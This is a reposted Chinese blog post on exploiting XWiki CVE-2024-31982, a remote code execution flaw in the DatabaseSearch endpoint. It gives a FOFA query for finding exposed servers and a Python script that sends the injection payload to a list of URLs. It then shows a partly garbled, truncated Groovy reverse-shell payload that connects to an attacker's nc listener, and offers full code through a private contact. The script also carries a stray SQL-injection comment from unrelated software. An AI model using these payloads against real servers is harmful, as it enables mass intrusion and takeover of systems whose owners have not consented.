xwiki-CVE-2024-31982漏洞深入复现

xwiki-CVE-2024-31982漏洞深入复现Ⅰ、漏洞描述

XWiki是一个由Java编写的基于LGPL协议发布的开源wiki和应用平台。它的开发平台特性允许创建协作式Web应用,同时也提供了构建于平台之上的打包应用(第二代wiki)。

XWiki  DatabaseSearch接口处存在RCE漏洞(CVE-2024-31982),恶意攻击者可能利用此漏洞执行恶意命令,获取服务器敏感信息,最终可能导致服务器失陷。

xwiki-CVE-2024-31982漏洞深入复现

xwiki-CVE-2024-31982漏洞深入复现Ⅱ、FOFA语句

body="data-xwiki-reference"

xwiki-CVE-2024-31982漏洞深入复现Ⅲ、漏洞复现

1、发送数据包执行命令

xwiki-CVE-2024-31982漏洞深入复现

如果你看到这里有了回显,说明漏洞复现成功

xwiki-CVE-2024-31982漏洞深入复现Ⅳ、python-POC

PS:完整代码联系我的我的师傅,陈师傅V:Changethe_one

他同意了才能给

xwiki-CVE-2024-31982漏洞深入复现

# GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e
import requestsfrom requests.packages.urllib3.exceptions import InsecureRequestWarningimport threadingimport queueimport time
headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Connection': 'keep-alive'}proxies = { 'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
def poc(url): if not url.startswith('http'): url = 'http://' + url if not url.endswith('/'): url += '/' payload = url + 'xwiki/bin/get/Main/DatabaseSearch?outputSyntax=plain&text=%7D%7D%7D%7B%7Basync%20as7B%2Fasync%7D%7D%20' try: requests.packages.urllib3.disable_warnings(InsecureRequestWarning) response = requests.get(payload, headers = headers, proxies = proxies, verify = False, timeout = 5) print(url) if response.status_code == 200: print(url, '[+]存在xwiki-CVE-2024-31982漏洞') except requests.exceptions.Timeout: print(url, '连接超时') except Exception as e: if 'HTTPSConnectionPool' in str(e) or 'Burp Suite Professional' in str(e): print(url, '证书错误') else: print(str(e))
with open(input('urls:').strip(), 'r', encoding = 'utf-8')as f1: for url in f1: poc(url.strip())

这里很多文章是不是就已经结束了?

但是龙哥不会这么敷衍我的义父们

我们直接反弹shell

Ⅴ、反弹shell

1、启动一个自己搭建的服务

开启nc

xwiki-CVE-2024-31982漏洞深入复现

2、输入反弹shell指令;

PS:代码加密,陈师傅V:Changethe_one

他同意了才能给

7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dimport%20java..*%3B%0A%0AStrint%20port%20%3D%207777%3B%0A%0Atry%20%7B%0ort%29%3B%0A%20%20InputStream%20in.getInputStream%28%29%3B%0A%20%20OutputStream%20outputStream%20%3D%20socket.getOutputStream%28%29%3B%0A%20%20PrintWriter%20writer%20%3D%20new%20PrintWriter%28outputStream%2C%20true%29%3B%0A%20%20BufferedReader%20reader%20%3D%20new%20BufferedReader%28new%20InputStreamReader%28inpu

xwiki-CVE-2024-31982漏洞深入复现

蝎子粑粑独一份了吧,需要的可以联系

原文始发于微信公众号(暗影网安实验室):xwiki-CVE-2024-31982漏洞深入复现

版权声明:admin 发表于 2024年6月23日 下午6:19。
转载请注明:xwiki-CVE-2024-31982漏洞深入复现 | CTF导航

相关文章